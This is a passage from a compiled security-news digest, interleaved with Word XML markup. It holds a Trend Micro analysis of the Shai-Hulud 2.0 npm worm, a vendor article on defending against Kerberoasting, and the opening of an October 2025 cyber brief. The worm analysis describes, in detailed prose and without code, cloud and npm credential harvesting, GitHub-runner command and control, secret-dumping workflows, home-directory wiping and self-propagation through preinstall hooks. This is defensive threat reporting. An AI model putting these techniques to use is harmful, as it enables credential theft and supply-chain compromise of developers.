suspicion). This happens while the background child process, which inherited all environment variables including credentials, continues running completely hidden from the user to steal credentials.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9. Spawning of detached background process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aL0() function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aL0() is an asynchronous JavaScript function that targets CI/CD environments and developer workstations to steal credentials from AWS, GCP, and Azure cloud providers, along with NPM tokens and GitHub authentication credentials. When authentication fails, the malware executes destructive commands to wipe user data.The function begins by detecting if it's running in a GitHub Actions CI environment.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malware uses 3 functions to establish persistence and disable security controls on Linux systems. The cQ0() function performs process detection by checking if the malware agent is already running on the system by searching for "/home/agent/agent" in the process list.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10. Function used to check for /home/agent/agent in the process list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pQ0() function attempts privilege escalation by first testing whether passwordless sudo access is available, and if not, it exploits Docker's privileged container access to mount the host filesystem and modify the sudoers configuration file to grant itself unrestricted root privileges.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11. Function used for privilege escalation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Finally, the gQ0() function disables security controls by stopping and reconfiguring the systemd-resolved DNS service with a malicious configuration file, then systematically flushing iptables firewall rules in both the OUTPUT and DOCKER-USER chains to remove any network filtering that could block command-and-control (C&amp;C) communications or data exfiltration.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12. Function used to disable security controls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Next, the malware instantiates modules for three major cloud providers and GitHub to prepare credential harvesting modules for AWS, Google Cloud Platform, Azure, and GitHub.</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13. Instantiation of modules for credential harvesting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NPM token retrieval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malware uses a credential theft module that targets NPM authentication tokens from developer workstations. It searches for .NPMrc configuration files in two locations: the current working directory and the user's home directory, which are standard locations where NPM stores registry authentication credentials. The function reads these files line by line, skipping comments and empty lines, then uses a regular expression pattern to extract NPM authentication tokens that match the format _authToken= or :_authToken= followed by a base64-encoded token string.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14. Function used to extract NPM authentication tokens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malware then validates the token by calling NPM's /-/whoami API endpoint to verify the token works and retrieve the authenticated username. The whoami function verifies NPM authentication and retrieves the victim's NPM username, which is then used to query for packages they maintain. If validation succeeds, the username is stored and used in a later stage to enumerate all packages the victim maintains (up to 100 packages) and the validated token is then used to publish backdoored versions of those packages to the NPM registry.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15. Validates victim's NPM token and retrieves username for package enumeration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Command-and-control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16. C&amp;C Installation execution flow</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malware creates a GitHub repository and establishes C&amp;C infrastructure. It first verifies that GitHub authentication is available to ensure the malware has valid stolen GitHub credentials before proceeding. It then generates an 18-character random identifier that will serve as the unique repository name for this specific infected victim, ensuring each compromised machine has its own dedicated C&amp;C repository.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repository creation via GitHub API</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createRepo() function uses the GitHub Octokit API to call repos.createForAuthenticatedUser() with the random name, the description "Shai-Hulud: The Second Coming.", and specific configuration settings including public visibility, discussions enabled, and all other features like issues, projects, and wiki disabled to keep the repository minimal and focused on C&amp;C operations.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17. Creation of attacker-controlled Git repository using the GitHub Octokit API</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successful creation, it extracts the repository owner's login username and the repository name from the API response, then constructs the full repository path in the format "owner/repo" and stores it in this.gitRepo for future reference.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18. Initialization and registration of the attacker-created GitHub repository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Workflow permission verification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calls checkWorkflowScope() to validate whether the stolen GitHub token has the workflow OAuth scope permission, which is required to manage GitHub Actions workflows and runners. It sends a HEAD request to GitHub's API and examines the x-oauth-scopes response header, which contains a comma- separated list of token permissions. The function parses this header, checks if "workflow" is present in the list, and caches the result in this.hasWorkflow. If the workflow scope exists, the malware can proceed with deploying self-hosted runners and C&amp;C workflows.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19. Workflow scope detection enabling deployment of malicious runners and C&amp;C workflows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malware then requests a runner registration token from GitHub's API using a POST request to /repos/{owner}/{repo}/actions/runners/registration- token, which returns a temporary token needed to register a self-hosted runner with the repository.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20. Requesting a GitHub runner registration token for self-hosted runner deployment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Platform-specific runner deployment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Based on the detected operating system (Linux, Windows, or macOS), the malware downloads the appropriate GitHub Actions runner binary from the official GitHub releases, extracts it to a hidden directory ($HOME/.dev-env on Unix or the user's home directory on Windows), and configures it with the registration token to connect back to the newly created repository with the runner name "SHA1HULUD". The runner is launched in the background using nohup on Unix systems or a hidden PowerShell window on Windows, ensuring it continues running even after the initial malware process exits and establishing persistent access to the compromised machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>C&amp;C workflow installation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malware creates a GitHub Actions workflow file at .github/workflows/discussion.yaml in the repository that triggers whenever a discussion is created, allowing the attacker to execute arbitrary commands on the infected machine by simply posting messages in the repository's discussion section, completing the C&amp;C infrastructure setup.</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21. Creation of a malicious GitHub Actions workflow enabling command execution via discussion posts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Anti-analysis failsafe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If an NPM token is invalid or not found, and the malware also fails to obtain a valid GitHub token, it executes destructive commands that attempt to delete all files in the user's home directory.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22. Executed destructive commands if GitHub authentication fails and no NPM token is found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System information collection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malware then collects detailed system information and GitHub credentials to build a comprehensive profile of the victim system including platform details, hostname, OS user information, and GitHub authentication status.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23. Collection of system metadata and GitHub credentials for victim profiling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Malicious workflow creation for secret exfiltration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addition to the discussion.yaml workflow shown above, the malware creates another GitHub Actions workflow specifically designed to steal all repository secrets. The workflow injection mechanism leverages GitHub's native CI/CD infrastructure to automatically exfiltrate sensitive data whenever code is pushed to compromised repositories.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24. Malicious workflow injection to retrieve GitHub secrets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Workflow injection mechanism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malware systematically iterates through all repositories accessible to the compromised GitHub account, creating malicious workflow files in each one. To avoid immediate detection, the malware first creates a temporary branch with a timestamped name following the pattern add-linter-workflow- {timestamp}. This branch naming convention appears legitimate, mimicking common development practices where developers create feature branches for adding code quality tools like linters and formatters. By injecting the malicious workflow on a separate branch rather than directly on the main branch, the malware reduces the risk of triggering branch protection rules or immediate code review processes that might expose the malicious activity.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25. Temporary Branch Creation for Workflow Injection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Malicious workflow content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malicious workflow file is carefully crafted to appear as a legitimate code formatting tool while concealing its true purpose of credential exfiltration. The workflow is named "Code Formatter" and configured to trigger on every push event, ensuring it executes automatically whenever any developer commits code to the repository. The core of the attack leverages GitHub Actions' built-in secrets context, which provides access to all repository secrets configured in the repository settings. By using the toJSON() function, the malware serializes the entire secrets object into a JSON string, capturing every credential stored in the repository including cloud provider keys, API tokens, database passwords, and signing certificates.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26. Disguises secret exfiltration as code formatting workflow using toJSON(secrets)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Workflow execution monitoring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injecting the malicious workflow file into the target repository, the malware enters a monitoring phase where it actively polls the GitHub Actions API to detect when the workflow executes and completes. The malware implements a polling loop with a 30-second timeout, repeatedly querying the repository's workflow runs every 2 seconds to identify the newly created workflow execution. This monitoring mechanism is necessary because the workflow only triggers when code is pushed to the repository, and the malware needs to wait for either an existing automated process or a developer to push code that will trigger the malicious workflow.</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27. Monitors GitHub Actions API with 30-second timeout to detect workflow execution and completion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Artifact download and secret extraction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Once the workflow begins execution, the malware tracks its progress by checking the workflow status, waiting for it to transition to "completed" before attempting to download the exfiltrated secrets from the workflow artifacts.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28. Polls workflow run status to ensure execution completed before artifact download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Once the workflow is completed, the malware queries the GitHub Actions Artifacts API to list all artifacts produced by the workflow run. GitHub Actions allows workflows to upload multiple artifacts, so the malware must enumerate the artifact list to identify the specific artifact containing the stolen secrets. The API returns an array of artifact objects, each containing metadata such as the artifact ID, name, size, and download URL. The malware iterates through this array looking for the artifact named "formatting" that was uploaded by the malicious workflow's actions/upload- artifact@v5 step.</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29. Polls workflow run status to ensure execution completed before artifact download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GitHub implements a two-step download process for artifacts to provide secure, time-limited access to artifact storage. The malware first requests the artifact download endpoint with the artifact ID, setting the redirect parameter to "manual" to prevent automatic redirect following. This initial request returns a Location header containing a temporary, pre-signed URL that points to the actual artifact storage location. The malware extracts this redirect URL from the response headers, then makes a second HTTP request to this temporary URL to download the actual ZIP file containing the stolen secrets.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30. Retrieves redirect URL then downloads ZIP file from temporary storage location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successfully downloading the artifact ZIP file, the malware must extract the format.json file containing the stolen repository secrets. The download response is received as an ArrayBuffer, which the malware converts to a Node.js Buffer object for processing. Using a ZIP archive library (referenced as tG0["default"]), the malware opens the ZIP archive and calls getEntry("format.json") to locate the specific file containing the exfiltrated secrets. Once the entry is found, the malware extracts the file data and converts it from binary to a UTF-8 string, revealing the JSON- formatted repository secrets that were captured by the malicious workflow.</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Multi-cloud credential harvesting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malware simultaneously harvests credentials from all three major cloud providers by first capturing the complete set of environment variables, which may contain API keys, tokens, and passwords. It then retrieves secrets from AWS using the AWS Secrets Manager API, extracts Google Cloud secrets through the GCP Secret Manager API, and collects Azure secrets via Azure Key Vault.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31. Simultaneous harvesting of cloud environment secrets using environment variable dumps and cloud secret-manager APIs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AWS credential collection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malware implements AWS credential harvesting by leveraging the AWS SDK's built-in credential provider chain. This mechanism automatically searches for credentials in environment variables following the standard AWS credential lookup order. The implementation uses a getter method that checks for the presence of required AWS environment variables (AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY) and extracts them along with optional session tokens.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32. Harvesting AWS credentials via the SDK's environment variable lookup chain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credential extraction function operates asynchronously and includes detailed logging capabilities that can be enabled through the malware's configuration. When credentials are found, the function constructs a credential object containing the access key ID, secret access key, and session token (if present). Additionally, the malware captures extended credential metadata including expiration timestamps, credential scope information, and AWS account IDs.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33. Asynchronous AWS credential extraction with optional logging, returning keys, tokens, and metadata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malware also targets AWS configuration files stored in the user's home directory by implementing file path resolution functions that follow AWS CLI conventions. The implementation first checks for custom file paths specified through environment variables (AWS_CONFIG_FILE and AWS_SHARED_CREDENTIALS_FILE), then falls back to default locations in the ~/.aws/ directory.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34. AWS config file harvesting via environment-aware path resolution following standard AWS CLI conventions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malware includes specialized functionality for stealing credentials from containerized environments, specifically targeting AWS ECS (Elastic Container Service) and EKS (Elastic Kubernetes Service) task credential mechanisms. The implementation checks for container-specific environment variables that point to credential endpoints exposed by the container runtime. These endpoints provide temporary credentials with IAM role permissions assigned to the container task, making them highly valuable for attackers seeking to move laterally within cloud infrastructure.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35. Container-specific credential harvesting from ECS/EKS task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Google Cloud Platform (GCP) credential collection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malware also targets Google Cloud Platform's Application Default Credentials (ADC) system, which is the recommended authentication method for GCP applications. The implementation begins by checking the GOOGLE_APPLICATION_CREDENTIALS environment variable (case-insensitive to catch variations), which typically points to a service account JSON key file. When the environment variable is found, the malware attempts to read the referenced credential file and extract the service account private key, client email, and project information.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36. GCP ADC credential theft via GOOGLE_APPLICATION_CREDENTIALS and service account key extraction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malware implements platform-aware logic to locate the Google Cloud SDK configuration directory, which stores authenticated user credentials and project settings. The function first checks for the CLOUDSDK_CONFIG environment variable that allows users to customize the configuration directory location. If this variable is not set, the malware determines the appropriate default path based on the operating system, using %APPDATA%\gcloud on Windows systems and ~/.config/gcloud on Unix-like systems.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Once the configuration directory is located, the malware accesses multiple credential stores within this directory and various authentication tokens cached by the gcloud CLI.</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37. Platform-aware discovery of the GCP SDK config directory and extraction of cached gcloud authentication tokens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The malware implements a targeted file existence check and extraction routine specifically for the Application Default Credentials JSON file. The implementation includes defensive programming with an existence check (existsSync) to avoid errors when the file is not present, silently failing and setting the path to null rather than throwing exceptions that might alert monitoring systems.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38. Targeted check for the ADC JSON file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Azure credential collection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malware also implements a comprehensive Azure credential harvesting system that targets the entire spectrum of Azure authentication methods. The implementation begins by defining an array of critical Azure environment variables and systematically checking for their presence in the process environment. The credential provider includes intelligent parsing logic that handles complex configurations such as semicolon-delimited tenant lists and boolean flag conversions.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malware logs discovered environment variables using a verbose logging system, providing attackers with visibility into which authentication methods are available on the compromised system.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39. Scanning of Azure-related environment variables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malware implements a cascading credential extraction system that attempts multiple Azure authentication methods. The implementation first attempts to extract Service Principal credentials with client secrets (the most common authentication method for automated systems), which requires a tenant ID, client ID, and client secret. If these three values are present, the malware instantiates a ClientSecrietCredential object that can be used to authenticate to Azure Resource Manager and access Azure resources with the permissions granted to the service principal. Each successful credential extraction is logged with tenant and client IDs.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40. Azure credential harvesting to extract Service Principal credentials from available environment variables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If client secret authentication fails, the malware falls back to certificate-based authentication by checking for AZURE_CLIENT_CERTIFICATE_PATH, and optionally, AZURE_CLIENT_CERTIFICATE_PASSWORD.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41. Azure fallback to certificate-based authentication by checking for client certificate paths and optional passwords.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malware then attempts username and/or password authentication though it includes warning logic suggesting this method is deprecated.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42. Azure username/password authentication attempt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malware also includes support for extracting Workload Identity credentials, a modern Azure authentication mechanism used primarily in Kubernetes environments. The implementation targets three critical environment variables: AZURE_TENANT_ID, AZURE_CLIENT_ID, and AZURE_FEDERATED_TOKEN_FILE.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43. Azure Workload Identity credential harvesting via key environment-variable checks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malware also targets credentials from Azure Pod Identity, a legacy system that remains widely used for providing Azure identities to Kubernetes pods.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implementation checks for the AZURE_POD_IDENTITY_AUTHORITY_HOST environment variable, which points to the Instance Metadata Service (IMDS) endpoint that provides managed identity tokens. When this variable is present, the malware constructs the full OAuth token endpoint URL by appending the standard token path to the authority host.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If the environment variable is not set, the malware falls back to the standard Azure IMDS endpoint.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44. Azure Pod Identity credential harvesting via IMDS endpoint discovery and token retrieval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Active Cloud secret manager exploitation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Beyond stealing static credentials, the malware uses stolen cloud credentials to access cloud-native secret management services.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implementation includes dedicated processes for AWS Secrets Manager, GCP Secret Manager, and Azure Key Vault, each implementing the listAndRetrieveAllSecrets() method to enumerate and extract secrets stored in these services.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AWS secrets manager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AWS secret harvesting module implements a multi-region secret harvesting strategy that maximizes the number of secrets retrieved. The WX class first validates stolen AWS credentials using the STS GetCallerIdentity API call to ensure they are active and to extract identity information (User ID, Account ID, ARN).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Once credentials are validated, the malware iterates through 17 major AWS regions to discover secrets stored in regional Secrets Manager services. For each region, the malware calls the ListSecrets API to enumerate available secrets, then retrieves each secret's value using GetSecretValue.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GCP secrets manager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GCP secret-harvesting module uses advanced authentication handling, first validating access by calling getAccessToken() from the Google Auth library. Once credentials are confirmed, the malware queries the Resource Manager API to list all accessible GCP projects, then creates a Secret Manager client for each project. It enumerates secrets with listSecrets() and retrieves their latest versions using the {secretName}/versions/latest path, extracting both the secret payload and associated metadata.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45. GCP secret harvesting via access-token validation, project enumeration, and per-project Secret Manager extraction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Azure Key Vault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The Azure secret harvesting implementation targets Microsoft's Key Vault service by first authenticating using the DefaultAzureCredential provider, which attempts multiple authentication methods in sequence (environment variables, managed identity, Azure CLI credentials). Once authenticated, the malware uses the Resource Manager API to list all Key Vault resources in the subscription by filtering for resources with type Microsoft.KeyVault/vaults. For each discovered vault, the malware instantiates a SecretClient and iterates through all secrets, retrieving their values.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46. Azure Key Vault harvesting via DefaultAzureCredential authentication, vault enumeration, and bulk secret extraction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TruffleHog secret scanning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malware uses an automated TruffleHog deployment system that downloads, extracts, and caches the latest version of the tool directly from GitHub. It Before downloading anything, it checks its cache for an existing TruffleHog binary; if none is found, it fetches the latest release info from GitHub, downloads the correct binary for the system, extracts it, and makes it executable.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47. Simultaneous harvesting of cloud environment secrets using environment variable dumps and cloud secret-manager API</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malware uses the GitHub API to automatically retrieve the latest TruffleHog release information without needing authentication, sending a GET request to /repos/trufflesecurity/trufflehog/releases/latest to obtain metadata and platform-specific download links. This removes the need to hard-code version numbers and ensures it remains compatible with future updates.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48. Automated TruffleHog setup with release lookup</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malware uses TruffleHog's filesystem scanner to sweep the victim's home directory for hardcoded secrets, invoking the tool with JSON output for easy parsing and optional arguments to narrow or customize the scan. It runs the scan with a 10-minute timeout to avoid long, suspicious execution times, capturing both output and errors. The results are packaged into a structured report containing discovered secrets, errors, scan duration, and the tool's exit code, allowing operators to quickly assess whether the scan succeeded, partially completed, or failed.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49. TruffleHog filesystem scan over the home directory, collecting JSON-formatted findings, errors, duration, and exit codes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Data exfiltration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malware implements a multi-stage exfiltration system that aggregates and uploads four distinct categories of stolen data to an attacker- controlled Git repository that the malware automatically creates under the victim's own GitHub account. The exfiltration process creates four separate JSON files, each containing specific categories of stolen data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>File Name Description contents.json Aggregates system metadata such as platform details, hostname, OS user information, and GitHub authentication status.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>environment.json Dumps all environment variables, capturing cloud credentials, API keys, database strings, and other sensitive config data. cloud.json Contains secrets retrieved from AWS Secrets Manager, GCP Secret Manager, and Azure Key Vault, showing that the malware uses stolen credentials to access cloud-native secret stores.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>truffleSecrets.json Stores TruffleHog scan results, including hardcoded secrets found in source code, config files, and other documents within the user's home directory.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Supply chain propagation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50. Supply Chain Compromise of NPM packages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malware automatically backdoors every NPM package maintained by the victim, republishing them with malicious payloads that run during package installation. This creates a wormable vector capable of spreading exponentially across the NPM ecosystem and potentially compromising thousands of downstream users who trust the affected packages.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attack unfolds in five phases: discovering all packages owned by the victim, downloading their original tarballs, injecting malicious preinstall hooks, bundling the malware installer, and republishing the modified packages as legitimate updates.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entire workflow is automated and parallelized across up to 100 packages at once, maximizing propagation while keeping detection opportunities minimal.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Maintainer package retrieval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malware queries the NPM registry to discover all packages maintained by the authenticated victim. The implementation uses NPM's search API with the maintainer: filter to enumerate packages owned by the compromised account. The package enumeration includes detailed metadata collection for each discovered package, including download statistics that allow the malware to prioritize high-impact targets. By sorting packages by monthly downloads in descending order, the attack maximizes potential victim count by compromising the most popular packages first.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51. NPM Package Enumeration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NPM registry search</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search implementation uses NPM's official search API endpoint (/- /v1/search) with proper URL encoding and authentication headers. The default search limit of 20 packages can be overridden, and in the actual attack execution, the malware requests up to 100 packages.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Figure 52. NPM Registry Search API Implementation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Package download and extraction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malware downloads the original package tarball from the NPM registry, preparing it for modification. This ensures the backdoored version maintains all original functionality while adding malicious capabilities. The download process uses standard HTTP fetching with compression support (gzip, deflate, brotli) to efficiently retrieve packages. The temporary directory naming (NPM-update-) mimics legitimate NPM tooling to avoid detection by process monitoring systems.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53. Package Tarball Download and Extraction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Preinstall hook injection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core of the supply chain attack involves modifying the package's package.json file to inject a malicious preinstall script. This script executes automatically when anyone runs NPM install on the package, even before the package's actual dependencies are installed.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54. Malicious package.json Modification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preinstall script executes during the NPM installation lifecycle at the earliest possible stage, specifically: Before dependency resolution Before package installation Before any legitimate package code runs With the user's full permissions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Malicious payload bundling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malware bundles a sophisticated multi-stage installer script (setup_bun.js) that handles Bun runtime installation and malware execution as mentioned at the beginning of this analysis. This script is designed to work across Windows, Linux, and macOS platforms.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55. Injects setup_bun.js installer and bun_environment.js malware payload into package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Package republishing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injecting malicious code and bundling payloads, the malware repackages the modified package and publishes it to NPM using the victim's credentials. The publishing process uses the victim's NPM authentication token obtained earlier in the attack, making the malicious update appear as a legitimate release from the trusted package maintainer. The version bump (patch increment) follows semantic versioning conventions, making it appear as a bug fix or minor update that users would typically install without scrutiny.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56. Repackages modified package and publishes to NPM using victim's credentials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Proactive security with Trend Vision OneTM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 Vision OneTM is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management and security operations, delivering robust layered protection across on-premises, hybrid, and multi- cloud environments.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following sections contain Trend Vision One insights, reports, and queries mentioned in the previous blog with additional information from this report.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 Vision OneTM Threat Intelligence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 stay ahead of evolving threats, Trend customers can accessTrend Vision OneTM Threat Insightswhich provides the latest insights from TrendTM Research on emerging threats and threat actors.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 Vision One Threat Insights Shai-Hulud 2.0 npm Supply Chain Attack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 Vision One Intelligence Reports (IOC Sweeping) Shai-Hulud 2.0 npm Supply Chain Attack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Hunting Queries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 Vision One Search App</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 Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.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malName:*SHULUD* AND eventName: MALWARE_DETECTION AND LogType: detection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Indicators of Compromise (IoCs)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Indicators of Compromise can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2025.11.27 12:03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/25/k/shai-hulud-2-0-targets-cloud-and-developer-systems.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Kerberoasting in 2025: How to protect your service accounts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by Specops Software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November 13, 2025 10:02 AM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Kerberoasting attacks remain an enduring headache for IT professionals, allowing hackers to escalate privileges and reach the highest levels of your Active Directory (AD) environment. But by enforcing robust passwords, encryption, and cybersecurity policies, you can disrupt the criminals before they even begin.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term Kerberoasting refers to ‘Kerberos', the authentication protocol that Microsoft's AD uses to verify the identity of computers or users requesting access to specific resources.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The attack's power lies in its escalatory nature. A cybercriminal can begin by exploiting any standard Windows user account in AD, accessed through the usual roster of criminal techniques: malware, phishing, etc.</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the attacker's real goal is to target ‘service accounts', identifiable by their Service Principal Name (SPN). These are the types of accounts that run Windows services and aren't typically used by regular users.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Service accounts are attractive for hackers because they often contain high- level permissions across services, and in some cases, even domain administrator access. How Kerberoasting works in Active Directory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 how does an attacker jump from a normal user account to a service account? The danger lies in the system's ticket-granting mechanism within Kerberos.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Kerberos protocol conveys user authentication state in a message called a ‘service ticket'. Any user with an AD account can request tickets to any service account in AD from the ticket-granting service (TGS). This means that, using the normal user account under their control, an attacker can request a service ticket tied to an SPN.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Hackers can identify such accounts quite easily by using free, open-source tools like SecureAuth Corporation's GetUserSPNs.py or Ghost Pack's Rubeus. These tools can also automatically request a valid ticket associated with these service accounts.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Each ticket is encrypted with the hash of the target account's password: the password tied to the SPN. The attacker takes the ticket offline and uses brute force techniques to crack the password hash at their leisure, enabling them to take over the service account and all its associated access, with the ability to scale from there.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Secure your Active Directory passwords with Specops Password Policy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Verizon's Data Breach Investigation Report found stolen credentials are involved in 44.7% of breaches.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Effortlessly secure Active Directory with compliant password policies, blocking 4+ billion compromised passwords, boosting security, and slashing support hassles! Try it for free Password priorities for stronger security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None of this would be possible if accounts were properly protected: even if the hacker got their hands on a ticket and took it offline, the highest levels of encryption and password complexity would frustrate their efforts to crack the ticket hash.</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 obvious first step, then, is to audit the passwords you use, ensuring they're fit for purpose in a world of Kerberoasting.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Tools like Specops Password Auditor can play a key role here, scanning your AD for password-related vulnerabilities. This works on three key levels: Audit AD accounts: Check user accounts against 1 billion vulnerable passwords, scan for weak passwords that could be targeted by attackers and audit your domain for stale or inactive privileged accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze risk with password reports: Ensure that your policies drive users to create secure passwords. Identify accounts with expired, identical or blank passwords, and measure the effectiveness of your policies against brute force attacks.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Align password policies with compliance standards: Benchmark your password policies against the best standards and check you comply with cybersecurity and privacy regulations. Why Kerberoasting is hard to detect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We've seen how simple it is for clever criminals to escalate their privileges by exploiting the architecture of AD. But there's another problem: Kerberoasting can be hard to detect even when it's underway.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First, the hackers' efforts to crack the ticket occur offline, making them undetectable. But it gets worse: these attacks don't need malware to operate, so they can't be detected by traditional solutions like antivirus tools.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And because the attacker begins by taking control of a legitimate account, they can avoid cybersecurity detection solutions, because these usually aren't designed to monitor the behavior of approved users.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 what can be done to defend your accounts against Kerberoasting? There are lots of options to reduce risk, but here are some key priorities. Audit all domain account passwords regularly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 we've seen, passwords are the weakest links. Each SPN-enabled account should be protected with non-reusable, random, and lengthy passwords of at least 25 characters. You should also ensure that these passwords are rotated regularly. Use Group Managed Service Accounts (gMSAs)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is a type of AD account that enables multiple services or servers to use the same account, providing simplified SPN handling and automatic password management. As Microsoft notes, passwords for gMSAs are "120 characters long, complex, and randomly generated, making them highly resistant to brute force cyberattacks using currently known methods". Opt for AES encryption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Not all service accounts are equal in their potential risk to hackers. The weakest targets are those that use flimsy encryption algorithms, with RC4 a particular concern. Accounts using AES encryption are far harder for criminals to crack.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Next steps to protect service accounts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Kerberoasting is a significant threat, but the dangers can be addressed. The first step is to conduct an audit of all user accounts with SPNs. If you find that some accounts don't need SPNs, simply remove them. If you want to run a read-only scan of your Active Directory today, download our free auditing tool: Specops Password Auditor.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At a wider level, enforce robust password policies and cybersecurity hygiene across your organization. Remember that Kerberoasting begins by attacking a normal user account, so ensure everyone uses long, complex passwords that are regularly rotated. Even better, pursue a policy of multi- factor authentication, and ensure employees are aware of the dangers from malware and phishing.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Cybercriminals exploit easily accessible tools to pursue their attacks. However, technology is also on your side. For instance, Specops Password Policy is designed to continuously block more than 4 billion unique compromised passwords, scanning for these potential problems and discovering breached passwords daily.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such defenses, you can ensure Kerberoasting fails from the outset and protect your vital service accounts from exploitation.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Book a live demo of Specops Password Policy today.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and written by Specops Software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2025.11.13 19:07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/kerberoasting-in-2025-how-to-protect-your-service-accounts/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Cyber Brief 25-11 - October 2025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Cyber Brief (October 2025)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November 3, 2025 - Version: 1</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TLP:CLEAR Executive summary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 analysed 281 open source reports for this Cyber Brief1.</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Relating to cyber policy and law enforcement, the European Commission published a landmark report on the resilience of European data cable infrastructure. A joint law enforcement operation with Europol dismantled a fraudulent SIM box operation, and 65 countries signed the first United Nations treaty to combat cybercrime.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 the cyberespionage front, China-linked Salt Typhoon and Flax Typhoon were observed collaborating in a Premier Pass-as-a-Service scheme. Graphite spyware targeted an Italian businessman and journalists using zero-click attacks, and China-linked UTA0388 engaged in a global e-mail spearphishing campaign that likely leveraged LLMs.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were disruptive attacks on Latvian state websites, causing a significant disruption in service, and an attack on the Dutch Public Health Institute RIVM caused a temporary shutdown. Pro-Russia hacktivists breached a decoy water-treatment plant HMI.</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Regarding data exposure and leaks incidents, Stormous cybercrime group reportedly breached France Travail using an automated credential stuffing attack, and a Swedish national electric grid operator was breached via an external file transfer system. US company F5 disclosed a nation-state intrusion that stole undisclosed vulnerabilities and source code.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 for opportunistic attacks, Broadcom disclosed a zero-day being exploited by China-linked threat actors, while Getsafety uncovered a fake 